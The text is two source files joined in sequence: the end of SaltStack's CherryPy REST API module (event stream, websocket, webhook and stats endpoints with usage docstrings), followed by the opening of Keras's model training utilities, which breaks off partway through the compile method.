Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript appliction is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
training.py
|
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
assert len(targets) == len(losses) == len(output_shapes)
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def collect_trainable_weights(layer):
'''Collects all `trainable_weights` attributes,
excluding any sublayers where `trainable` is set the `False`.
'''
trainable = getattr(layer, 'trainable', True)
if not trainable:
return []
weights = []
if layer.__class__.__name__ == 'Sequential':
for sublayer in layer.flattened_layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Model':
for sublayer in layer.layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Graph':
for sublayer in layer._graph_nodes.values():
weights += collect_trainable_weights(sublayer)
else:
weights += layer.trainable_weights
# dedupe weights
weights = list(set(weights))
weights.sort(key=lambda x: x.name)
return weights
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
# Reset random seed else all children processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop, generator_threads
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
